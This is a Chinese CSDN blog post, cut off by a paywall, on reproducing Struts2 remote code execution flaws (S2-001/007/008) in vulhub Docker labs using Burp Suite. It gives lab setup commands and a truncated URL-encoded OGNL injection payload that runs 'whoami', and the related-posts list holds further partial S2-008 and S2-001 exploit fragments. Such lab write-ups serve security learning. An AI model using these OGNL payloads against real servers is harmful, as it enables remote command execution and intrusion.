docker—vulhub—struts2漏洞复现详细过程(s2-001/007/008)

最新推荐文章于 2024-04-05 15:15:35 发布
VIP文章 最新推荐文章于 2024-04-05 15:15:35 发布
阅读量2.9k 收藏 9
点赞数 1
分类专栏: 漏洞复现 文章标签: struts2漏洞复现详细过程 docker vulhub centos7 日志
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/amybaby00/article/details/103058585
版权

本文为学习笔记,仅限学习交流。
不得利用、从事危害国家或人民安全、荣誉和利益等活动。
请参阅《中华人民共和国网络安全法》

简介&准备:
1、centos7 已开启docker :systemctl restart docker.service
2、进入vulhub —struts2 : cd vulhub/struts2
3、启用测试环境:docker-compose up -d (参照模块下的说明文档)
4、PC机打开网址:youIP:8080 (参照模块下的说明文档)
5、开启BP抓包测试,修改Payload
复现成功!
6、查看日志

s2-001 复现全过程:

1、开启docker
进入vulhub —struts2—s2-001
命令:cd vulhub/struts2/s2-001
查看s2-001目录
命令:ls
(Readme.md 英文说明, Readme.zh-cn.md 中文说明)
先查看说明文件 命令:cat Readme.zh-cn.md

在这里插入图片描述
在这里插入图片描述
启动容器(参照说明命令)
命令:docker-compose build
docker-compose up -d

在这里插入图片描述
2、PC机网页访问:
youIP :8080
显示登录页面
开启代理,开启BP 抓包

在这里插入图片描述
3、BP抓包,发送至Repeater模块
在用户名或密码处尝试修改payload:

%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22whoami%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c
最低0.47元/天 解锁文章
YANG公子
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
vulhub-S2-008 远程代码执行漏洞-漏洞复现
wocao___的博客
02-22 530
S2-008 远程代码执行漏洞 影响版本: 2.1.0 - 2.3.1 测试环境搭建 docker-compose up -d 原理 S2-008 涉及多个漏洞,Cookie 拦截器错误配置可造成 OGNL 表达式执行,但是由于大多 Web 容器(如 Tomcat)对 Cookie 名称都有字符限制,一些关键字符无法使用使得这个点显得比较鸡肋。另一个比较鸡肋的点就是在 struts2 应用开启 devMode 模 式后会有多个调试接口能够直接查看对象信息或直接执行命令,正如 kxlzx 所提这种情况在生
镜像 k8s.gcr.io/sig-storage/nfs-subdir-external-provisioner:v4.0.2
04-22
docker镜像 k8s.gcr.io/sig-storage/nfs-subdir-external-provisioner:v4.0.2 被墙无法pull,使用nfs方式提供k8s PVC必须的镜像包。 本人小水管拉下来的,拿走不谢。 使用方法: #解压 tar -xvf k8s.gcr.io_sig-...
Vulhub靶场之struts2漏洞复现
weixin_66717977的博客
03-21 1170
struts2漏洞中属s2系列杀伤力最大,本文基于vulhub靶场,将介绍并复现strut2漏洞
vulhubStruts2-005 远程代码执行漏洞复现
最新发布
yougexiaojiuguan的博客
04-05 292
漏洞复现过程的记录
vulhubS2-008漏洞复现
qq_45300786的博客
07-08 407
poc http://192.168.100.23:8080/devmode.action?debug=command&expression=%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true
struts2s2-001)远程代码执行漏洞docker&&vulhub复现
qq_43455259的博客
07-12 1682
struts2s2-001)远程代码执行漏洞docker&&vulhub复现
vulhub靶场struts2漏洞复现
weixin_44300286的博客
03-06 2150
0x01、S2-001远程代码执行漏洞 原理 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 影响版本 Struts 2.0.0 - Struts 2.0.8 poc 执行任意命令 %{#a=(new java.lan
vulhub靶场搭建安装包,包含docker-compose安装包
02-01
使用这条命令西在docker-compose太慢了而且老失败 sudo curl -L "https://github.com/docker/compose/releases/download/1.29.2/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose 使用...
docker-compose-2.20.2安装包
08-11
docker-compose-2.20.2安装包
docker-compose创建镜像报错:ERROR: Service ‘mytest‘ failed to build: Build failed
weixin_45387943的博客
07-26 4116
这个正常情况下,代码没有出现什么问题。问题在于docker-compose的版本太高导致的。通过docker-composeversion命令查看现在的版本。高于1.26.2就会报错。需要重新安装docker-comp。在使用docker-composeup-d--buid命令的时候有时候会报错。这是因为使用docker-compose版本太新导致的。从网上招一个低版本的安装即可解决这个问题。...
vulhub靶场搭建以及对于struts2漏洞s2-001的idea环境调试搭建,ctf.show的java(web279-web280)
wanan的博客
09-03 1733
vulhub靶场搭建以及对于struts2漏洞s2-001的idea环境调试搭建,ctf.show的java(web279-web280)
Struts2 S2-012复现
ZJT6666666的博客
12-22 167
Struts2 S2-012复现
vulhub-struts2-S2-008 远程代码执行漏洞复现
qq_56426046的博客
06-19 423
影响版本: 2.1.0 - 2.3.1。
漏洞复现vulhub struts2/s2-062
qq_46421742的博客
06-30 221
Struts 2 最初被称为 WebWork 2,它是一个简洁的、可扩展的框架,可用于创建企业级Java web应用框架。设计这个框架是为了从构建、部署、到应用程序维护方面来简化整个开发周期。Struts 2 是一个基于MVC设计模式MVC模型 --- 属于软件设计模式的底层基础,主要负责数据维护。视图 --- 这部分是负责向用户呈现全部或部分数据。控制器 --- 通过软件代码控制模型和视图之间的交互。
[Vulhub] Struts2 S2-057 S2-059 S2-061 漏洞复现
weixin_45605352的博客
06-07 1103
Struts2 S2-057 RCE (CVE-2018-11776) 0x00 漏洞描述 Apache Struts是一个现在较为主流的开源框架,是用于使用Java编程语言开发Web应用程序。 定义XML配置时如果namespace值未设置且上层动作配置(Action Configuration)中未设置或用通配符namespace时可能会导致远程代码执行。 url标签未设置value和action值且上层动作未设置或用通配符namespace时可能会导致远程代码执行。 0x01 影响版本 Stru
vulhub靶场框架漏洞复现手册(strusts2\shiro\weblogic)附工具链接
zwy15288408160的博客
12-15 1363
工具+手工复现vulhub靶场下的框架漏洞,包括struts2远程代码执行(2-029,s2-061,s2-001),shiro反序列化漏洞(CVE-2016-4437),weblogic反序列化漏洞(CVE-2017-10271,CVE-2018-2628,CVE-2018-2894,CVE-2020-14882,ssrf,weak-password)。持续更新中...持续更新中...
一个Struts2启动失败的例子,新手值得一看。
im110的专栏
09-24 1279
问题:Struts2启动失败(Tomcat控制台输出 严重:error filterStart)具体描述:我用Struts2集成Spring之后,可以打开登录页,但一提交就提示找不到action,于是在web.xml中注释掉Spring集成。之后连项目都启动不了,启动的时候老是提示:严重:error filterStart。刚开始以为是Struts2架包的问题,但是相同的jar包,在一个单独的St
请用docker-compose写出下面这串代码: docker run --name es-s2 --restart=always -p 9200:9200 -p 9300:9300 -e "discovery.type=single-node" -v /mydata/se_cluster/es-s2/config:/usr/share/elasticsearch/config -v /mydata/se_cluster/es-s2/data:/usr/share/elasticsearch/data -v /mydata/se_cluster/es-s2/plugins:/usr/share/elasticsearch/plugins -v /mydata/se_cluster/es-s2/logs:/usr/share/elasticsearch/logs -e TAKE_FILE_OWNERSHIP="true" -d elasticsearch:7.9.0
06-09
version: '3' services: es-s2: container_name: es-s2 restart: always ports: - "9200:9200" - "9300:9300" environment: - discovery.type=single-node - TAKE_FILE_OWNERSHIP=true volumes: - /mydata/se_cluster/es-s2/config:/usr/share/elasticsearch/config - /mydata/se_cluster/es-s2/data:/usr/share/elasticsearch/data - /mydata/se_cluster/es-s2/plugins:/usr/share/elasticsearch/plugins - /mydata/se_cluster/es-s2/logs:/usr/share/elasticsearch/logs image: elasticsearch:7.9.0 detach: true

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值